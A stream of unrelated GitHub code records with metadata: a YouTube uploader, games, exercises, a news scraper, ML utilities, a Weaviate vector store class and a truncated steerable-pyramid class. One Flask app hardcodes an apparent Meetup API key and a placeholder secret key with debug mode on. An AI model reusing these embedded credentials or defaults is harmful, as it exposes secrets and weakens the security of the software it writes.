end+=1\n print(f\"Ack recieved for {ack_index}\")\n if ack_index>=len(lst):\n recv.append(lst[ack_index-1])\n ack_index+=1\n ","repo_name":"Snehanjan2001/network-prac-sem","sub_path":"prac_exam_sol/goback.py","file_name":"goback.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"38044687134","text":"#!/usr/bin/python\n# This file is modified from the sample code of Youtube Data API.\n\nimport http.client\nimport httplib2\nimport json\nimport random\nimport time\nimport datetime\nimport google.oauth2.credentials\nimport googleapiclient.discovery\n\nfrom googleapiclient.errors import HttpError\nfrom googleapiclient.http import MediaFileUpload\n\n\n# Explicitly tell the underlying HTTP transport library not to retry, since\n# we are handling retry logic ourselves.\nhttplib2.RETRIES = 1\n\n# Maximum number of times to retry before giving up.\nMAX_RETRIES = 10\n\n# Always retry when these exceptions are raised.\nRETRIABLE_EXCEPTIONS = (\n IOError,\n httplib2.HttpLib2Error, http.client.NotConnected,\n http.client.IncompleteRead, http.client.ImproperConnectionState,\n http.client.CannotSendRequest, http.client.CannotSendHeader,\n http.client.ResponseNotReady, http.client.BadStatusLine,\n)\n\n# Always retry when an apiclient.errors.HttpError with one of these status\n# codes is raised.\nRETRIABLE_STATUS_CODES = [500, 502, 503, 504]\n\nOAUTH_TOKEN_FILE = 'token.json'\n\n# This OAuth 2.0 access scope allows for full read/write access to the\n# authenticated user's account and requires requests to use an SSL connection.\nSCOPES = [\n 'https://www.googleapis.com/auth/youtube',\n 'https://www.googleapis.com/auth/youtube.force-ssl',\n 'https://www.googleapis.com/auth/youtube.readonly',\n 'https://www.googleapis.com/auth/youtube.upload',\n]\nAPI_SERVICE_NAME = 'youtube'\nAPI_VERSION = 'v3'\n\nDEFAULT_PRIVACY_STATUS = 'unlisted'\n\n\ndef save_json_to_file(filename, jsonData):\n with open(filename, 'w') as f:\n json.dump(jsonData, f)\n\n\ndef credentials_to_dict(credentials):\n return {\n 'token': credentials.token,\n 'refresh_token': credentials.refresh_token,\n 'token_uri': credentials.token_uri,\n 'client_id': credentials.client_id,\n 'client_secret': credentials.client_secret,\n 'scopes': credentials.scopes,\n }\n\n\nclass YoutubeService:\n def __init__(self, token_file=OAUTH_TOKEN_FILE):\n self.token_file = token_file\n self.youtube = self._get_youtube_service()\n\n def _get_youtube_service(self): \n credentials = google.oauth2.credentials.Credentials.from_authorized_user_file(\n self.token_file)\n original_creds_dict = credentials_to_dict(credentials)\n\n youtube = googleapiclient.discovery.build(\n API_SERVICE_NAME, API_VERSION, credentials=credentials)\n\n # Save credentials back to the token JSON file in case access token was refreshed.\n new_credentials_dict = credentials_to_dict(credentials)\n if original_creds_dict != new_credentials_dict:\n save_json_to_file(self.token_file, new_credentials_dict)\n \n return youtube\n \n def list_live_broadcasts(self):\n request = self.youtube.liveBroadcasts().list(\n part='id,snippet,contentDetails,status',\n mine=True,\n )\n broadcasts = request.execute()\n print('Live Broadcasts:', broadcasts)\n return broadcasts\n \n def list_live_streams(self):\n request = self.youtube.liveStreams().list(\n part='id,cdn,snippet,status',\n mine=True,\n )\n livestreams = request.execute()\n print('Live Streams:', livestreams)\n return livestreams\n \n def start_live_broadcast(self, title, privacyStatus=DEFAULT_PRIVACY_STATUS):\n scheduled_start_time = datetime.datetime.utcnow() + datetime.timedelta(minutes=1)\n body = {\n 'snippet': {\n 'title': title,\n 'scheduledStartTime': scheduled_start_time.isoformat() + 'Z',\n },\n 'status': {\n 'privacyStatus': privacyStatus,\n },\n 'contentDetails': {\n 'enableAutoStart': True,\n 'enableAutoStop': True,\n },\n }\n broadcast_request = self.youtube.liveBroadcasts().insert(\n part='id,snippet,contentDetails,status',\n body=body,\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource\n broadcast = broadcast_request.execute()\n return broadcast\n \n def start_livestream(self, title):\n body = {\n 'snippet': {\n 'title': title,\n },\n 'cdn': {\n 'frameRate': 'variable',\n 'ingestionType': 'hls',\n 'resolution': 'variable'\n },\n }\n \n request = self.youtube.liveStreams().insert(\n part='id,snippet,cdn,contentDetails,status',\n body=body,\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveStreams#resource\n livestream = request.execute()\n return livestream\n \n def bind_broadcast_to_livestream(self, broadcast_id, livestream_id):\n # Bind the broadcast to the stream\n bind_request = self.youtube.liveBroadcasts().bind(\n id=broadcast_id,\n part='id,snippet',\n streamId=livestream_id\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource\n bind_response = bind_request.execute()\n return bind_response\n \n def transition_to_live(self, broadcast_id):\n request = self.youtube.liveBroadcasts().transition(\n broadcastStatus='live',\n id=broadcast_id,\n part='id,snippet,contentDetails,status'\n )\n \n # Response type\n # https://developers.google.com/youtube/v3/live/docs/liveBroadcasts#resource\n response = request.execute()\n return response\n \n \n def upload(self, filepath, title=None, privacyStatus=DEFAULT_PRIVACY_STATUS):\n body = {\n 'snippet': {\n 'title': title,\n },\n 'status': {\n 'privacyStatus': privacyStatus\n },\n }\n\n # Call the API's videos.insert method to create and upload the video.\n insert_request = self.youtube.videos().insert(\n part=','.join(list(body.keys())),\n body=body,\n # Setting 'chunksize' equal to -1 in the code below means that the entire\n # file will be uploaded in a single HTTP request. (If the upload fails,\n # it will still be retried where it left off.)\n media_body=MediaFileUpload(filepath, chunksize=-1, resumable=True)\n )\n\n self.resumable_upload(insert_request)\n\n # This method implements an exponential backoff strategy to resume a\n # failed upload.\n def resumable_upload(self, insert_request):\n response = None\n error = None\n retry = 0\n while response is None:\n try:\n print('Uploading file...')\n status, response = insert_request.next_chunk()\n if response is not None:\n if 'id' in response:\n print('Video id \"%s\" was successfully uploaded.' % response['id'])\n else:\n exit('The upload failed with an unexpected response: %s' % response)\n except HttpError as e:\n if e.resp.status in RETRIABLE_STATUS_CODES:\n error = 'A retriable HTTP error %d occurred:\\n%s' % (e.resp.status,\n e.content)\n else:\n raise\n except RETRIABLE_EXCEPTIONS as e:\n error = 'A retriable error occurred: %s' % e\n\n if error is not None:\n print(error)\n retry += 1\n if retry > MAX_RETRIES:\n exit('No longer attempting to retry.')\n\n max_sleep = 2 ** retry\n sleep_seconds = random.random() * max_sleep\n print('Sleeping %f seconds and then retrying...' % sleep_seconds)\n time.sleep(sleep_seconds)\n\n'''\nif __name__ == '__main__':\n argparser.add_argument('--file', required=True, help='Video file to upload')\n argparser.add_argument('--title', help='Video title', default='Test Title')\n argparser.add_argument('--description', help='Video description',\n default='Test Description')\n argparser.add_argument('--category', default='22',\n help='Numeric video category. ' +\n 'See https://developers.google.com/youtube/v3/docs/videoCategories/list')\n argparser.add_argument('--keywords', help='Video keywords, comma separated',\n default='')\n argparser.add_argument('--privacyStatus', choices=VALID_PRIVACY_STATUSES,\n default=VALID_PRIVACY_STATUSES[0], help='Video privacy status.')\n args = argparser.parse_args()\n\n if not os.path.exists(args.file):\n exit('Please specify a valid file using the --file= parameter.')\n\n youtube = get_youtube_service(args)\n try:\n initialize_upload(youtube, args)\n except HttpError as e:\n print('An HTTP error %d occurred:\\n%s' % (e.resp.status, e.content))\n'''","repo_name":"c-rainbow/stream-youtube-uploader","sub_path":"youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":8288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"30700548666","text":"# Imports\nimport os\nimport random\n\n# Functions\ndef clearConsole():\n command = 'clear'\n if os.name in ('nt', 'dos'): # If Machine is running on Windows, use cls\n command = 'cls'\n os.system(command)\n\n\ndef display_board(board):\n clearConsole()\n disboard=''\n for row in [7,4,1]:\n disboard+= ' | '.join(board[row:row+3])+ '\\n'\n\n print(disboard)\n \ndef player_input():\n choice=['X','O']\n while True:\n player = input('Please choose X or O: ').upper()\n if player in choice:\n if player=='X':\n firstplayermarker='X'\n secondplayermarker='O'\n elif player=='O':\n firstplayermarker='O'\n secondplayermarker='X'\n return (firstplayermarker,secondplayermarker)\n else:\n print('Sorry! Please choose either X or O') \n\ndef place_marker(board, marker, position):\n if position in range(1,10):\n board[position]=marker\n return board\n\ndef win_check(board, mark):\n #horizonal\n if all(m == mark for m in board[1:4] ) or all(m == mark for m in board[4:7]) or all(m == mark for m in board[7:10]):\n print(f'Player {mark} wins the game')\n return True\n #vertical\n elif all(m == mark for m in board[1:8:3]) or all(m == mark for m in board[2:9:3]) or all(m == mark for m in board[3:10:3] ):\n print(f'Player {mark} wins the game')\n return True \n #diagonal\n elif all(m == mark for m in board[1:10:4] ) or all(m == mark for m in board[3:8:2]):\n print(f'Player {mark} wins the game')\n return True\n else:\n return False\n \ndef choose_first():\n first = random.randint(1,2)\n if first==1:\n print('Player 1 goes first.')\n else:\n print('Player 2 goes first.')\n\ndef space_check(board, position):\n if board[position]=='' or board[position]==' ':\n freespace= True\n return freespace\n else:\n freespace= False\n return freespace\n\ndef full_board_check(board):\n for fullboard in board[1:10]:\n if fullboard==' ':\n return False\n print('Game is a Tie!')\n return True \n \ndef player_choice(board):\n positionchoice=False\n while positionchoice==False:\n position=input('Choose position [1,9]: ')\n if position.isdigit():\n position=int(position)\n else:\n print('This is not a digit, try again.')\n continue\n if position in range(1,10) :\n positionchoice=space_check(board,position)\n else:\n print('Please choose a valid position [1,9].')\n return position\n\ndef replay():\n inputcheck=False\n while inputcheck==False:\n playagainchoice = input('Do you want to play again? Y or N. ').upper()\n if playagainchoice== 'Y' or playagainchoice=='N':\n if playagainchoice=='Y':\n playchoice = True\n else:\n playchoice = False\n inputcheck=True\n else:\n print('Please choose a valid answer, Y or N.\\n')\n inputcheck=False\n\n return playchoice\n\n# Game Code\nprint('Welcome to Tic Tac Toe!')\nrow1 = ' 1 | 2 | 3 '\nrow2 = ' 4 | 5 | 6 '\nrow3 = ' 7 | 8 | 9 '\nprint(row3)\nprint(row2)\nprint(row1)\n\nplayagain = True\nwhile playagain == True:\n # Set the game up here\n choose_first()\n (firstplayermarker, secondplayermarker) = player_input()\n game_off = False\n board = ['#', ' ', ' ',' ', ' ', ' ', ' ', ' ', ' ', ' ']\n while game_off == False:\n #Player 1 Turn\n position = player_choice(board)\n place_marker(board, firstplayermarker, position)\n display_board(board)\n game_off = win_check(board, firstplayermarker)\n if game_off:\n break\n game_off = full_board_check(board)\n if game_off:\n break\n print(f\"{secondplayermarker}'s Turn\")\n\n # Player2's turn.\n position = player_choice(board)\n place_marker(board, secondplayermarker, position)\n display_board(board)\n game_off = win_check(board, secondplayermarker)\n if game_off:\n break\n game_off = full_board_check(board)\n if game_off:\n break\n print(f\"{firstplayermarker}'s Turn\")\n\n playagain = replay()\n ","repo_name":"YMuflahi/TicTacToe-Python","sub_path":"tictactoe.py","file_name":"tictactoe.py","file_ext":"py","file_size_in_byte":4313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"25318146341","text":"from WindPy import w\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\nimport cPickle\n\n# start wind\nw.start()\n\n# load the classifier\nwith open('lr_classifier.pkl', 'rb') as fid:\n model_loaded = cPickle.load(fid)\n\nprint(\"\\n\")\n\nwhile True:\n\n\t# Input date\n\tyear, month, day = input('Please input year,month,day (with a comma in between): \\n')\n\t# if month==1:\n\t# \tlast_year=year-1\n\t# \tlast_month=12\n\t# else:\n\t# \tlast_year=year\n\t# \tlast_month=month-1\n\t# start_day=str(last_year)+'-'+str(last_month)+'-'+str(day)\n\tend_day=str(year)+'-'+str(month)+'-'+str(day)\n\n\t# get wind data\n\twsd_data=w.wsd(\"000300.SH\", \"amt,turn,pct_chg,pe_ttm,pb,roe,yoy_tr,yoy_or,yoyprofit,close\", \"ED0M\", end_day, \"Period=M;Days=Alldays;PriceAdj=F\")\n\ttime=wsd_data.Times\n\tamt=wsd_data.Data[0]\n\tturn=wsd_data.Data[1]\n\tpct_chg=wsd_data.Data[2]\n\tpe_ttm=wsd_data.Data[3]\n\t# pb=wsd_data.Data[4]\n\t# roe=wsd_data.Data[5]\n\t# yoy_tr=wsd_data.Data[6]\n\t# yoy_or=wsd_data.Data[7]\n\t# yoyprofit=wsd_data.Data[8]\n\tclose=wsd_data.Data[9]\n\n\t# generate train data\n\tdata=[amt[0],turn[0],pct_chg[0],pe_ttm[0]]\n\ttest_data=[data]\n\tpredict_lable=model_loaded.predict(test_data)\n\tpredict_prob=model_loaded.predict_proba(test_data)\n\tif predict_lable[0]==0:\n\t\tans=\"bear\"\n\telif predict_lable[0]==1:\n\t\tans=\"vibrate\"\n\telse:\n\t\tans=\"bull\"\n\tprint(repr(time[0].year) + '-' + repr(time[0].month) + '-' + repr(time[0].day) + '\\t' + ans + '\\n' + \"Bear:\"+repr(predict_prob[0,0]) + '\\t' + \"Vibrate:\" + repr(predict_prob[0,1]) + '\\t' + \"Bull:\" + repr(predict_prob[0,2]) + '\\n')","repo_name":"Aureliu/Stock-Analysis","sub_path":"量化/广发基金/牛熊市分类/stock_bull_bear.py","file_name":"stock_bull_bear.py","file_ext":"py","file_size_in_byte":1544,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"39"} +{"seq_id":"25683225226","text":"#O código de César é uma das mais simples e conhecidas técnicas de criptografia. É um tipo de substituição na qual cada letra do texto é substituída por outra, que se apresenta no alfabeto abaixo dela um número fixo de vezes. Por exemplo, com uma troca de três posições, 'A' seria substituído por 'D', 'B' se tornaria 'E', e assim por diante. Implement um programa que faça uso desse Código de César (3 posições), entre com uma string e retorne a string codificada.\r\n\r\nfrase = input(\"Frase: \").upper()\r\n\r\ncripto = \"\"\r\nfor i in frase:\r\n if i.isalpha():\r\n cripto += chr(ord(i)+3)\r\n else:\r\n cripto += i\r\n\r\nprint(f\"String: {frase}\")\r\nprint(f\"Criptografada: {cripto}\")","repo_name":"marllon2004/Python-BCC","sub_path":"2° Semestre - Exercícios/lista01/ex012.py","file_name":"ex012.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"37880750309","text":"'''给定一个未经排序的整数数组,找到最长且 连续递增的子序列,并返回该序列的长度。\n\n连续递增的子序列 可以由两个下标 l 和 r(l < r)确定,如果对于每个 l <= i < r,都有 nums[i] < nums[i + 1] ,那幺子序列 [nums[l], nums[l + 1], ..., nums[r - 1], nums[r]] 就是连续递增子序列。\n\n \n\n示例 1:\n\n输入:nums = [1,3,5,4,7]\n输出:3\n解释:最长连续递增序列是 [1,3,5], 长度为3。\n尽管 [1,3,5,7] 也是升序的子序列, 但它不是连续的,因为 5 和 7 在原数组里被 4 隔开。\n示例 2:\n\n输入:nums = [2,2,2,2,2]\n输出:1\n解释:最长连续递增序列是 [2], 长度为1。\n \n\n提示:\n\n0 <= nums.length <= 104\n-109 <= nums[i] <= 109\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/longest-continuous-increasing-subsequence\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。'''\nfrom typing import List\n\n\nclass Solution:\n def findLengthOfLCIS(self, nums: List[int]) -> int:\n if not nums:\n return 0\n ans = 1\n a = 1\n for i in range(1, len(nums)):\n if nums[i] > nums[i - 1]:\n a += 1\n else:\n ans = max(ans, a)\n a = 1\n return max(a,ans)\n","repo_name":"aa694849243/leetcode_cj","sub_path":"601-700/674. 最长连续递增序列.py","file_name":"674. 最长连续递增序列.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"5058389977","text":"from typing import Tuple\nfrom torch.utils.data import Dataset, DataLoader\nimport torchvision.transforms as T\nfrom torchvision import datasets\nimport torch\nimport numpy as np\nimport os\nfrom PIL import Image\nimport glob\nimport matplotlib.pyplot as plt\nfrom skimage.color import lab2rgb, rgb2lab, rgb2gray\nimport shutil\n\nfrom torchvision.transforms.functional import resize\n\nclass ColorizeData(Dataset):\n def __init__(self, paths):\n # Initialize dataset, you may use a second dataset for validation if required\n # Use the input transform to convert images to grayscale\n self.input_transform = T.Compose([T.Resize(size=(256,256)),\n T.Grayscale(),\n T.ToTensor(),\n T.Normalize((0.5), (0.5))\n ])\n # Use this on target images(colorful ones)\n self.target_transform = T.Compose([T.Resize(size=(256,256)),\n T.ToTensor(),\n T.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n \n self.paths = paths\n \n def __len__(self) -> int:\n # return Length of dataset\n return len(self.paths)\n \n def __getitem__(self, index: int) -> Tuple[torch.Tensor, torch.Tensor]:\n # Return the input tensor and output tensor for training\n input_img = Image.open(self.paths[index]).convert(\"RGB\")\n transformed_img = self.input_transform(input_img)\n target = self.target_transform(input_img)\n return (transformed_img, target)\n\ndef make_dataloaders( dataset:Dataset, batch_size=16, n_workers=4, pin_memory=True):\n dataloader = DataLoader(dataset, batch_size=batch_size, num_workers=n_workers, pin_memory=pin_memory)\n return dataloader\n\ndef getTrainValData(directory, mode='Train'):\n paths = glob.glob(directory + '*.jpg')\n np.random.seed(123)\n paths_subset = np.random.choice(paths, 4000, replace=False)\n rand_idxs = np.random.permutation(4000)\n train_idxs = rand_idxs[:3500]\n val_idxs = rand_idxs[3500:]\n train_paths = paths_subset[train_idxs]\n val_paths = paths_subset[val_idxs]\n if(mode == 'Train'):\n return ColorizeData(paths=train_paths)\n elif(mode == 'Val'):\n return ColorizeData(paths=val_paths)\n\n\nclass AverageMeter(object):\n '''A handy class from the PyTorch ImageNet tutorial''' \n def __init__(self):\n self.reset()\n def reset(self):\n self.val, self.avg, self.sum, self.count = 0, 0, 0, 0\n def update(self, val, n=1):\n self.val = val\n self.sum += val * n\n self.count += n\n self.avg = self.sum / self.count\n\ndef visualize_image(grayscale_input, ab_input=None, show_image=False, save_path=None, save_name=None):\n '''Show or save image given grayscale (and ab color) inputs. Input save_path in the form {'grayscale': '/path/', 'colorized': '/path/'}'''\n plt.clf() # clear matplotlib plot\n ab_input = ab_input.cpu()\n grayscale_input = grayscale_input.cpu() \n if ab_input is None:\n grayscale_input = grayscale_input.squeeze().numpy() \n if save_path is not None and save_name is not None: \n plt.imsave(grayscale_input, '{}.{}'.format(save_path['grayscale'], save_name) , cmap='gray')\n if show_image: \n plt.imshow(grayscale_input, cmap='gray')\n plt.show()\n else:\n ab_input[0] = grayscale_input[0]\n color_image = ab_input.numpy()\n color_image = color_image.transpose((1, 2, 0)) \n color_image[:, :, 0:1] = color_image[:, :, 0:1] * 100\n color_image[:, :, 1:3] = color_image[:, :, 1:3] * 255 - 128 \n color_image = lab2rgb(color_image.astype(np.float64))\n grayscale_input = grayscale_input.squeeze().numpy()\n if save_path is not None and save_name is not None:\n plt.imsave(arr=grayscale_input, fname='{}{}'.format(save_path['grayscale'], save_name), cmap='gray')\n plt.imsave(arr=color_image, fname='{}{}'.format(save_path['colorized'], save_name))\n if show_image: \n f, axarr = plt.subplots(1, 2)\n axarr[0].imshow(grayscale_input, cmap='gray')\n axarr[1].imshow(color_image)\n plt.show()\n\ndef save_checkpoint(state, is_best_so_far, filename='checkpoints/checkpoint.pth.tar'):\n '''Saves checkpoint, and replace the old best model if the current model is better'''\n torch.save(state, filename)\n if is_best_so_far:\n shutil.copyfile(filename, 'checkpoints/model_best.pth.tar')\n\n# train_dl = make_dataloaders(paths=train_paths)\n# val_dl = make_dataloaders(paths=val_paths)","repo_name":"kushagraagrawal/Image_Colorization_pyTorch","sub_path":"image-colorization_d6a566/colorize_data.py","file_name":"colorize_data.py","file_ext":"py","file_size_in_byte":4703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"32184355198","text":"from flask import Flask, render_template, request\nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp = Flask(__name__)\napp.debug = True\nimport meetup.api\napp.config['SECRET_KEY'] = 'foobar'\n\ntoolbar = DebugToolbarExtension(app)\n\ndef get_names():\n client = meetup.api.Client(\"3f6d3275d3b6314e73453c4aa27\")\n\n rsvps=client.GetRsvps(event_id='235484841', urlname='_ChiPy_')\n member_id = ','.join([str(i['member']['member_id']) for i in rsvps.results])\n members = client.GetMembers(member_id=member_id)\n\n foo={}\n for member in members.results:\n try:\n foo[member['name']] = member['photo']['thumb_link']\n except:\n pass # ignore those who do not have a complete profile\n return foo\n\nmember_rsvps=get_names()\n\n@app.route('/rsvps')\ndef rsvps():\n return render_template('rsvps.html', rsvps=member_rsvps)\n\n\n@app.route('/teams', methods=['GET', 'POST'])\ndef teams():\n results = request.form.to_dict()\n return render_template('teams.html', teams=[results])\n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"chicagopython/CodingWorkshops","sub_path":"problems/webdev/flask_team_project/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","stars":62,"dataset":"github-code","pt":"39"} +{"seq_id":"2241287387","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\nimport csv\r\nimport time\r\n\r\nreq = requests.get('https://www.elwatan.com/category/edition/actualite')\r\nsoup = BeautifulSoup(req.text,'html.parser')\r\nmain = soup.find('div',class_='posts')\r\natag = main.find_all('h3',class_='title-14')\r\n\r\narti_link = []\r\narti_title = []\r\nwhile True:\r\n for i in atag:\r\n link = (i.find('a')['href'])\r\n title = (i.text).strip()\r\n if title not in arti_title:\r\n arti_title.append(title)\r\n if link not in arti_link:\r\n arti_link.append(link)\r\n print(title)\r\n print(link)\r\n print()\r\n l = 0\r\n #CSV part\r\n with open('elwaten.csv','w',newline='') as l1:\r\n fieldnames = ['Article_Titles','Article_links']\r\n thewriter = csv.DictWriter(l1,fieldnames=fieldnames)\r\n\r\n thewriter.writeheader()\r\n for i in arti_title:\r\n thewriter.writerow({'Article_Titles':i,'Article_links':arti_link[l]})\r\n l+=1\r\n time.sleep(180)\r\n \r\n\r\n\r\n\r\n \r\n \r\n","repo_name":"KArimCHidekh/WebScraping-App-and-Maching-Learing","sub_path":"Real_time_Scraping/elwaten_realtime.py","file_name":"elwaten_realtime.py","file_ext":"py","file_size_in_byte":1064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"} +{"seq_id":"16075712682","text":"from __future__ import division\nfrom pylab import *\nfrom sklearn import datasets, svm\nimport numpy\n\ndict = datasets.load_digits()\n\ndescr = dict['DESCR']\ndata = dict['data']\nimg = dict['images']\ntar = dict['target']\ntarget_names = dict['target_names']\n\ndef fromSKLearn():\n dict = datasets.load_digits()\n\n descr = dict['DESCR']\n data = dict['data']\n img = dict['images']\n tar = dict['target']\n target_names = dict['target_names']\n\n # they're the proper digits\n show = data.reshape(1797, 8, 8)\n\n # now, we have to figure out each number.\n # x is our data\n # w, the weights\n # so, s = w_1*x_1 ... w_n * x_n\n # y = dot(x^T, s)\n # \n\n clf = svm.SVC()#gamma=1e-5)\n clf.fit(data, tar)\n pred = clf.predict(data)\n\n # it's only wrong 0.1% of the time\n error = abs(pred - tar)\n\n\n# w_1 = \\arg \\max_{||w=1||} Var(x^T w)\n\n# multiply x by the w's\nx = data[0]\nw = rand(x.shape[0], x.shape[0])\n\nx = asmatrix(x)\nw = asmatrix(w)\na = x * w.T\n\n\n\n\n","repo_name":"stsievert/side-projects","sub_path":"dimension_reduction/dimension_reduction.py","file_name":"dimension_reduction.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"39"} +{"seq_id":"6888047118","text":"import os\nfrom typing import List\n\nfrom evadb.third_party.vector_stores.types import (\n FeaturePayload,\n VectorIndexQuery,\n VectorIndexQueryResult,\n VectorStore,\n)\nfrom evadb.utils.generic_utils import try_to_import_weaviate_client\n\nrequired_params = []\n_weaviate_init_done = False\n\n\nclass WeaviateVectorStore(VectorStore):\n def __init__(self, collection_name: str, **kwargs) -> None:\n try_to_import_weaviate_client()\n global _weaviate_init_done\n\n self._collection_name = collection_name\n\n # Get the API key.\n self._api_key = kwargs.get(\"WEAVIATE_API_KEY\")\n\n if not self._api_key:\n self._api_key = os.environ.get(\"WEAVIATE_API_KEY\")\n\n assert (\n self._api_key\n ), \"Please set your `WEAVIATE_API_KEY` using set command or environment variable (WEAVIATE_API_KEY). It can be found at the Details tab in WCS Dashboard.\"\n\n # Get the API Url.\n self._api_url = kwargs.get(\"WEAVIATE_API_URL\")\n\n if not self._api_url:\n self._api_url = os.environ.get(\"WEAVIATE_API_URL\")\n\n assert (\n self._api_url\n ), \"Please set your `WEAVIATE_API_URL` using set command or environment variable (WEAVIATE_API_URL). It can be found at the Details tab in WCS Dashboard.\"\n\n if not _weaviate_init_done:\n # Initialize weaviate client\n import weaviate\n\n client = weaviate.Client(\n url=self._api_url,\n auth_client_secret=weaviate.AuthApiKey(api_key=self._api_key),\n )\n client.schema.get()\n\n _weaviate_init_done = True\n\n self._client = client\n\n def create(\n self,\n vectorizer: str = \"text2vec-openai\",\n properties: list = None,\n module_config: dict = None,\n ):\n properties = properties or []\n module_config = module_config or {}\n\n collection_obj = {\n \"class\": self._collection_name,\n \"properties\": properties,\n \"vectorizer\": vectorizer,\n \"moduleConfig\": module_config,\n }\n\n if self._client.schema.exists(self._collection_name):\n self._client.schema.delete_class(self._collection_name)\n\n self._client.schema.create_class(collection_obj)\n\n def add(self, payload: List[FeaturePayload]) -> None:\n with self._client.batch as batch:\n for item in payload:\n data_object = {\"id\": item.id, \"vector\": item.embedding}\n batch.add_data_object(data_object, self._collection_name)\n\n def delete(self) -> None:\n self._client.schema.delete_class(self._collection_name)\n\n def query(self, query: VectorIndexQuery) -> VectorIndexQueryResult:\n response = (\n self._client.query.get(self._collection_name, [\"*\"])\n .with_near_vector({\"vector\": query.embedding})\n .with_limit(query.top_k)\n .do()\n )\n\n data = response.get(\"data\", {})\n results = data.get(\"Get\", {}).get(self._collection_name, [])\n\n similarities = [item[\"_additional\"][\"distance\"] for item in results]\n ids = [item[\"id\"] for item in results]\n\n return VectorIndexQueryResult(similarities, ids)\n","repo_name":"georgia-tech-db/evadb","sub_path":"evadb/third_party/vector_stores/weaviate.py","file_name":"weaviate.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":2438,"dataset":"github-code","pt":"39"} +{"seq_id":"28473075241","text":"\"\"\"\nThis code is based on the principles outlined in:\n\nJ Portilla and E P Simoncelli A Parametric Texture Model based on Joint Statistics of Complex Wavelet Coefficients Int'l\nJournal of Computer Vision. October, 2000.\n\nor a more concise background is available:\n\nbackground information is available: https://www.cns.nyu.edu/~eero/steerpyr/\n\nThe code in this file is an adaptation of the code in the following repo:\n\nhttps://github.com/LabForComputationalVision/matlabPyrTools\n\nWhere possible, variable names have been preserved for easy comparison with this toolbox\n\n\"\"\"\n\nfrom __future__ import division\n\nfrom scipy.interpolate import interp1d\nfrom scipy.misc import factorial\nimport matplotlib.pyplot as plt\nfrom copy import copy\nimport numpy as np\nimport cv2\n\nLOW_MASK = 1\nHI_MASK = 2\nBAND1 = 1\nBAND2 = 2\n\nLEVEL_1_IDX = 0\n\n\nclass Scy_pyr_builder_base(object):\n\n def __init__(self,\n im_h,\n im_w,\n levels=5,\n nbands=2,\n twidth=1,\n real_data_dtypes=np.float32,\n complex_data_dtype=np.csingle,\n ):\n\n self.im_h = im_h\n self.im_w = im_w\n self.dims_pyr_top_level = np.array((self.im_h, self.im_w))\n self.twidth = twidth\n self.complex_data_dtype = complex_data_dtype\n self.real_data_dtypes = real_data_dtypes\n\n self.levels = levels\n self.nbands = nbands\n self.order = self.nbands - 1\n\n self.lev_h = np.zeros(self.levels + 2, dtype=np.int)\n self.lev_w = np.zeros_like(self.lev_h, dtype=np.int)\n\n self.lev_h[0] = self.im_h\n self.lev_w[0] = self.im_w\n\n ###############################################################################\n # Preallocate memory for filter masks\n\n # recursively calculate the dimensions of each level\n for level in range(self.levels + 1):\n self.lev_h[level + 1] = np.int(np.ceil(self.lev_h[level] / 2.0))\n self.lev_w[level + 1] = np.int(np.ceil(self.lev_w[level] / 2.0))\n\n # print('lev_h', self.lev_h)\n # print('lev_w', self.lev_w)\n\n self.lostart = np.zeros((self.levels, 2))\n self.loend = np.zeros((self.levels, 2))\n\n # high_pass_mask - is a list of length \"level\" with a\n self.high_mask = [None] * self.levels\n self.lo_mask = [None] * self.levels\n self.angle_mask = [[None for i in range(self.nbands)] for j in range(self.levels)]\n # print self.angle_mask\n # print len(self.angle_mask)\n self.lodft = [None] * self.levels\n self.coefficients = [None] * self.nbands\n\n for level in range(self.levels):\n # print level\n self.high_mask[level] = np.zeros((self.lev_h[level], self.lev_w[level]), dtype=self.real_data_dtypes)\n\n # lo mask on the first level\n self.lo0mask = np.zeros((self.lev_h[LEVEL_1_IDX], self.lev_w[LEVEL_1_IDX]), dtype=self.real_data_dtypes)\n\n # lo mask on subsequent levels\n for level in range(self.levels):\n self.lo_mask[level] = np.zeros((self.lev_h[level + 1], self.lev_w[level + 1]),\n dtype=self.real_data_dtypes)\n\n # bandpass filter array\n for level in range(self.levels):\n for band in range(self.nbands):\n self.angle_mask[level][band] = np.zeros((self.lev_h[level], self.lev_w[level]),\n dtype=self.real_data_dtypes)\n\n # lo dft array\n for level in range(self.levels):\n self.lodft[level] = np.zeros((self.lev_h[level], self.lev_w[level]), dtype=self.complex_data_dtype)\n for band in range(self.nbands):\n self.coefficients[band] = np.zeros((self.lev_h[self.levels], self.lev_w[self.levels]),\n dtype=self.real_data_dtypes)\n\n @property\n def i(self):\n \"\"\" returns unary imaginary number \"\"\"\n return np.complex(0, 1)\n\n @property\n 